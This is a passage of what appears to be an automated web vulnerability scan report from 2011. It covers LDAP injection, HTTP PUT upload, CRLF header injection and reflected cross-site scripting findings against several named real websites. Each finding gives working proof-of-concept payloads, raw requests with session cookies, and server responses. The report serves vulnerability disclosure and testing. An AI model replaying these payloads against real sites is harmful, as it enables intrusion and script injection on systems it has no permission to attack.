                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a
...[SNIP]...

Request 2

GET /*)!(sn=*/jobs4/javascript/jobs_search_box.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: edf9973f-dbc0-444a-90a1-fdb5e628ed9c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/business/economy/obama-slams-oil-company-profits-as-gas-prices-surge/2011/04/29/AFPhwyGF_story.html">Obama slams oil company profits as gas prices surge</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the-relentless-smear-campaign-against-obama/2011/04/29/AFkSVyGF_story.html">The relentless smear campaign against Obama</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/birthers-buffoonery-and-a-sad-discourse/2011/04/29/AFdnwyGF_story.html">Birthers, buffoonery and a sad discourse</a>
               </li>
           <li>
                   <a href="http://live.washingtonpost.com/white-house-correspondents-dinner-2011-recap.html">2011 White House Correspondents Dinner: A recap - 2011 White House Correspondents</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the_obama_doctrine_leading_from_behind/201
...[SNIP]...

4.3. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnavLogo.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /wp-srv/ssi/globalnav/js/channelnavLogo.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/ssi/globalnav/js/channelnavLogo.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: edf9973f-dbc0-444a-90a1-fdb5e628ed9c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/business/economy/obama-slams-oil-company-profits-as-gas-prices-surge/2011/04/29/AFPhwyGF_story.html">Obama slams oil company profits as gas prices surge</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the-relentless-smear-campaign-against-obama/2011/04/29/AFkSVyGF_story.html">The relentless smear campaign against Obama</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/birthers-buffoonery-and-a-sad-discourse/2011/04/29/AFdnwyGF_story.html">Birthers, buffoonery and a sad discourse</a>
               </li>
           <li>
                   <a href="http://live.washingtonpost.com/white-house-correspondents-dinner-2011-recap.html">2011 White House Correspondents Dinner: A recap - 2011 White House Correspondents</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the_obama_doctrine_leading_from_behind/201
...[SNIP]...

Request 2

GET /*)!(sn=*/ssi/globalnav/js/channelnavLogo.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: f9bc6c41-6fd2-481e-b2a1-0a475f93cc95
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=119
Date: Sun, 01 May 2011 23:33:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/business/economy/running-in-the-red-how-the-us-on-the-road-to-surplus-detoured-to-massive-debt/2011/04/28/AFFU7rNF_story.html">Running in the red: How the U.S., on the road to surplus, detoured to massive debt</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/sports/redskins/nfl-draft-2011-redskins-add-nine-more-draft-picks-for-a-total-of-12/2011/04/30/AFTZo7NF_story.html">NFL draft 2011: Redskins add nine more draft picks for a total of 12</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/local/tornado-tally-at-19-for-maryland-and-virginia/2011/04/30/AFySjwOF_story.html">Tornado tally at 19 for Maryland and Virginia</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/world/libya-frontline-turns-quiet-as-rebels-regroup/2011/04/29/AFEwjwNF_story.html">Libya front line turns quiet as rebels regroup</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a
...[SNIP]...

5. HTTP PUT enabled  previous  next
There are 2 instances of this issue:


5.1. http://www.onlinemicrofiche.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onlinemicrofiche.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /1a950014e4506089.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /1a950014e4506089.txt HTTP/1.0
Host: www.onlinemicrofiche.com
Content-Length: 16

e5dcc84f7b5a59c8

Response 1

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 00:38:02 GMT
Location: http://www.onlinemicrofiche.com/1a950014e4506089.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /1a950014e4506089.txt HTTP/1.0
Host: www.onlinemicrofiche.com

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 00:38:02 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 02 May 2011 00:38:02 GMT
ETag: W/"da9f931618cc1:dc0"
Content-Length: 16

e5dcc84f7b5a59c8

5.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Viewcart.asp

Issue detail

HTTP PUT is enabled on the web server. The file /29ed5e51742981e7.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /29ed5e51742981e7.txt HTTP/1.0
Host: www.onlinemicrofiche.com
Content-Length: 16

8562c216a2d852a8

Response 1

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:43 GMT
Location: https://www.onlinemicrofiche.com/29ed5e51742981e7.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /29ed5e51742981e7.txt HTTP/1.0
Host: www.onlinemicrofiche.com

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:43 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 02 May 2011 03:19:43 GMT
ETag: W/"b8cdb9c7778cc1:dd2"
Content-Length: 16

8562c216a2d852a8

6. HTTP header injection  previous  next
There are 6 instances of this issue:


6.1. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 527ab%0d%0a3565611b9b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /527ab%0d%0a3565611b9b4/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha25jZmtCTDgzNVFtUmduUSxyJDAscmQkMTZpZmY1MGZtKSk/1/*http://global.ard.yahoo.com/SIG=15g2ds2nv/M=999999.999999.999999.999999/D=news/S=96654906:FB/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=iFueFUwN7y4-/J=1304292783275135/K=mbmuBMnyuFXFamzNMr12dQ/A=2394450929415713467/R=0/X=6/*;dcopt=rcl;mtfIFPath=nofile;ord=1304292783.275135? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/527ab
3565611b9b4
/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http: //clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha2
Date: Sun, 01 May 2011 23:34:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

6.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 83f32%0d%0a81dda35bbd7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /83f32%0d%0a81dda35bbd7/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/83f32
81dda35bbd7
/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http: //googleads.g.doubleclick.net/aclk
Date: Mon, 02 May 2011 02:29:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

6.3. http://ad.doubleclick.net/adj/wpni.jobs/front [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 889bb%0d%0ac948c2d7ba2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /889bb%0d%0ac948c2d7ba2/wpni.jobs/front;sz=728x90;pos=ad1;poe=yes;ad=lb;del=js;ajax=n;dcopt=ist;ad=interstitial;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=1;ord=29166153864935040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/889bb
c948c2d7ba2
/wpni.jobs/front;sz=728x90;pos=ad1;poe=yes;ad=lb;del=js;ajax=n;dcopt=ist;ad=interstitial;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=1;ord=29166153864935040:
Date: Sun, 01 May 2011 23:36:00 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

6.4. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 2 is copied into the location response header. The payload 81751%0d%0a4daf40cbe6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /n/81751%0d%0a4daf40cbe6/71938/EI6/x/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:39:12 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:39:12 GMT
location: http://dna1.mookie1.com/n/81751
4daf40cbe6
/71938/EI6/x/e?value=0&trans=&domain=na.decdna.net?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain


6.5. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload a58b5%0d%0aa827e2ca2c6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/61239/71938/a58b5%0d%0aa827e2ca2c6/x/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:40:30 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:40:30 GMT
location: http://dna1.mookie1.com/n/61239/71938/a58b5
a827e2ca2c6
/x/e?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain


6.6. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 5 is copied into the location response header. The payload 80700%0d%0af0193fdb2e3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /n/61239/71938/EI6/80700%0d%0af0193fdb2e3/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:41:09 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:41:09 GMT
location: http://dna1.mookie1.com/n/61239/71938/EI6/80700
f0193fdb2e3
/e?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain


7. Cross-site scripting (reflected)  previous  next
There are 151 instances of this issue:


7.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9596"-alert(1)-"aec72338c29 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=f9596"-alert(1)-"aec72338c29 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7829
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 02:28:57 GMT
Expires: Mon, 02 May 2011 02:28:57 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
